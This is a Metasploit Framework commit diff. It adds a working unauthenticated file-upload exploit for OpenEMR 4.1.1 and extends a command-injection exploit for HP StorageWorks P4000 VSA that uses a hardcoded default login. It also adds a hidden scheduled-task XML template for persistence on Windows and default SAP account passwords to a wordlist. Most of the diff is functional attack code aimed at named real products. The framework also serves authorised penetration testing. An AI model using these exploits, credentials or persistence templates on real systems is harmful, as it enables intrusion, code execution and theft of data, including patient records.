Merge branch 'rapid7' into R3dy-psexec-mixin2

kernelsmith · Feb 19, 2013 · f5d9887 · f5d9887
2 parents 4703278 + 37634a9
commit f5d9887
Show file tree

Hide file tree

Showing 8 changed files with 965 additions and 10 deletions.
diff --git a/data/exploits/s4u_persistence.xml b/data/exploits/s4u_persistence.xml
@@ -0,0 +1,50 @@
+<?xml version="1.0" encoding="UTF-16"?>
+<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
+  <RegistrationInfo>
+    <Date>DATEHERE</Date>
+    <Author>USERHERE</Author>
+  </RegistrationInfo>
+  <Triggers>
+    <TimeTrigger>
+      <Repetition>
+        <Interval>PT60M</Interval>
+        <StopAtDurationEnd>false</StopAtDurationEnd>
+      </Repetition>
+      <StartBoundary>DATEHERE</StartBoundary>
+      <Enabled>true</Enabled>
+    </TimeTrigger>
+  </Triggers>
+  <Principals>
+    <Principal id="Author">
+      <UserId>DOMAINHERE</UserId>
+      <LogonType>S4U</LogonType>
+      <RunLevel>LeastPrivilege</RunLevel>
+    </Principal>
+  </Principals>
+  <Settings>
+    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>
+    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>
+    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
+    <AllowHardTerminate>true</AllowHardTerminate>
+    <StartWhenAvailable>false</StartWhenAvailable>
+    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
+    <IdleSettings>
+      <Duration>PT10M</Duration>
+      <WaitTimeout>PT1H</WaitTimeout>
+      <StopOnIdleEnd>true</StopOnIdleEnd>
+      <RestartOnIdle>false</RestartOnIdle>
+    </IdleSettings>
+    <AllowStartOnDemand>true</AllowStartOnDemand>
+    <Enabled>true</Enabled>
+    <Hidden>true</Hidden>
+    <RunOnlyIfIdle>false</RunOnlyIfIdle>
+    <WakeToRun>false</WakeToRun>
+    <ExecutionTimeLimit>PT72H</ExecutionTimeLimit>
+    <Priority>7</Priority>
+  </Settings>
+  <Actions Context="Author">
+    <Exec>
+      <Command>COMMANDHERE</Command>
+    </Exec>
+  </Actions>
+</Task>
diff --git a/data/wordlists/sap_default.txt b/data/wordlists/sap_default.txt
@@ -12,3 +12,7 @@ ADS_AGENT ch4ngeme
 DEVELOPER ch4ngeme
 J2EE_ADMIN ch4ngeme
 SAPJSF ch4ngeme
+SAPR3 SAP
+CTB_ADMIN sap123
+XMI_DEMO sap123
+
diff --git a/modules/exploits/multi/misc/hp_vsa_exec.rb b/modules/exploits/multi/misc/hp_vsa_exec.rb
@@ -17,7 +17,7 @@ def initialize(info={})
 			'Name'           => "HP StorageWorks P4000 Virtual SAN Appliance Command Execution",
 			'Description'    => %q{
 					This module exploits a vulnerability found in HP's StorageWorks P4000 VSA on
-				versions prior to 9.5.  By using a default account credential, it is possible
+				versions prior to 9.5. By using a default account credential, it is possible
 				to inject arbitrary commands as part of a ping request via port 13838.
 			},
 			'License'        => MSF_LICENSE,
@@ -50,9 +50,11 @@ def initialize(info={})
 			'Arch'           => ARCH_CMD,
 			'Targets'        =>
 				[
-					['HP VSA prior to 9.5', {}]
+					[ 'Automatic',        {} ],
+					[ 'HP VSA up to 8.5', { 'Version' => '8.5.0' } ],
+					[ 'HP VSA 9',         { 'Version' => '9.0.0' } ]
 				],
-			'Privileged'     => false,
+			'Privileged'     => true,
 			'DisclosureDate' => "Nov 11 2011",
 			'DefaultTarget'  => 0))
 
@@ -75,20 +77,53 @@ def generate_packet(data)
 		pkt
 	end
 
+	def get_target
+		if target.name !~ /Automatic/
+			return target
+		end
 
-	def exploit
-		connect
-
-		# Login packet
-		print_status("#{rhost}:#{rport} Sending login packet")
+		# Login at 8.5.0
 		packet = generate_packet("login:/global$agent/L0CAlu53R/Version \"8.5.0\"")
+		print_status("#{rhost}:#{rport} Sending login packet for version 8.5.0")
+		sock.put(packet)
+		res = sock.get_once
+		vprint_status(Rex::Text.to_hex_dump(res)) if res
+		if res and res=~ /OK/ and res=~ /Login/
+			return targets[1]
+		end
+
+		# Login at 9.0.0
+		packet = generate_packet("login:/global$agent/L0CAlu53R/Version \"9.0.0\"")
+		print_status("#{rhost}:#{rport} Sending login packet for version 9.0.0")
 		sock.put(packet)
 		res = sock.get_once
 		vprint_status(Rex::Text.to_hex_dump(res)) if res
+		if res and res=~ /OK/ and res =~ /Login/
+			return targets[2]
+		end
+
+		fail_with(Msf::Exploit::Failure::NoTarget, "#{rhost}:#{rport} - Target auto detection didn't work'")
+	end
+
+	def exploit
+		connect
+
+		if target.name =~ /Automatic/
+			my_target = get_target
+			print_good("#{rhost}:#{rport} - Target #{my_target.name} found")
+		else
+			my_target = target
+			print_status("#{rhost}:#{rport} Sending login packet")
+			packet = generate_packet("login:/global$agent/L0CAlu53R/Version \"#{my_target['Version']}\"")
+			sock.put(packet)
+			res = sock.get_once
+			vprint_status(Rex::Text.to_hex_dump(res)) if res
+		end
 
 		# Command execution
 		print_status("#{rhost}:#{rport} Sending injection")
 		data = "get:/lhn/public/network/ping/127.0.0.1/foobar;#{payload.encoded}/"
+		data << "64/5/" if my_target.name =~ /9/
 		packet = generate_packet(data)
 		sock.put(packet)
 		res = sock.get_once

diff --git a/modules/exploits/unix/webapp/openemr_upload_exec.rb b/modules/exploits/unix/webapp/openemr_upload_exec.rb
@@ -0,0 +1,132 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+#   http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::Remote::HttpClient
+	include Msf::Exploit::FileDropper
+
+	def initialize(info={})
+		super(update_info(info,
+			'Name'           => "OpenEMR PHP File Upload Vulnerability",
+			'Description'    => %q{
+					This module exploits a vulnerability found in OpenEMR 4.1.1 By abusing the
+				ofc_upload_image.php file from the openflashchart library, a malicious user can
+				upload a file to the tmp-upload-images directory without any authentication, which
+				results in arbitrary code execution. The module has been tested successfully on
+				OpenEMR 4.1.1 over Ubuntu 10.04.
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         =>
+				[
+					'Gjoko Krstic <gjoko[at]zeroscience.mk>', # Discovery, PoC
+					'juan vazquez' # Metasploit module
+				],
+			'References'     =>
+				[
+					[ 'OSVDB', '90222' ],
+					[ 'BID', '37314' ],
+					[ 'EBD', '24492' ],
+					[ 'URL', 'http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5126.php' ],
+					[ 'URL', 'http://www.open-emr.org/wiki/index.php/OpenEMR_Patches' ]
+				],
+			'Platform'       => ['php'],
+			'Arch'           => ARCH_PHP,
+			'Targets'        =>
+				[
+					['OpenEMR 4.1.1', {}]
+				],
+			'Privileged'     => false,
+			'DisclosureDate' => "Feb 13 2013",
+			'DefaultTarget'  => 0))
+
+			register_options(
+				[
+					OptString.new('TARGETURI', [true, 'The base path to EGallery', '/openemr'])
+				], self.class)
+	end
+
+	def check
+		uri = target_uri.path
+		peer = "#{rhost}:#{rport}"
+
+		# Check version
+		print_status("#{peer} - Trying to detect installed version")
+
+		res = send_request_cgi({
+			'method' => 'GET',
+			'uri'    => normalize_uri(uri, "interface", "login", "login.php")
+		})
+
+		if res and res.code == 200 and res.body =~ /v(\d\.\d\.\d)/
+			version = $1
+		else
+			return Exploit::CheckCode::Unknown
+		end
+
+		print_status("#{peer} - Version #{version} detected")
+
+		if version > "4.1.1"
+			return Exploit::CheckCode::Safe
+		end
+
+		# Check for vulnerable component
+		print_status("#{peer} - Trying to detect the vulnerable component")
+
+		res = send_request_cgi({
+			'method' => 'GET',
+			'uri'    => normalize_uri("#{uri}", "library", "openflashchart", "php-ofc-library", "ofc_upload_image.php"),
+		})
+
+		if res and res.code == 200 and res.body =~ /Saving your image to/
+			return Exploit::CheckCode::Detected
+		end
+
+		return Exploit::CheckCode::Safe
+	end
+
+	def exploit
+		uri = target_uri.path
+
+		peer = "#{rhost}:#{rport}"
+		payload_name = rand_text_alpha(rand(10) + 5) + '.php'
+		my_payload = payload.encoded
+
+		print_status("#{peer} - Sending PHP payload (#{payload_name})")
+		res = send_request_raw({
+			'method'  => 'POST',
+			'uri'     => normalize_uri("#{uri}", "library", "openflashchart", "php-ofc-library", "ofc_upload_image.php") + "?name=#{payload_name}",
+			'headers' => { "Content-Length" => my_payload.length.to_s },
+			'data'    => my_payload
+		})
+
+		# If the server returns 200 and the body contains our payload name,
+		# we assume we uploaded the malicious file successfully
+		if not res or res.code != 200 or res.body !~ /Saving your image to.*#{payload_name}$/
+			fail_with(Exploit::Failure::NotVulnerable, "#{peer} - File wasn't uploaded, aborting!")
+		end
+
+		register_file_for_cleanup(payload_name)
+
+		print_status("#{peer} - Executing PHP payload (#{payload_name})")
+		# Execute our payload
+		res = send_request_cgi({
+			'method' => 'GET',
+			'uri'    => normalize_uri("#{uri}", "library", "openflashchart", "tmp-upload-images", payload_name),
+		})
+
+		# If we don't get a 200 when we request our malicious payload, we suspect
+		# we don't have a shell, either.  Print the status code for debugging purposes.
+		if res and res.code != 200
+			print_error("#{peer} - Server returned #{res.code.to_s}")
+		end
+	end
+
+end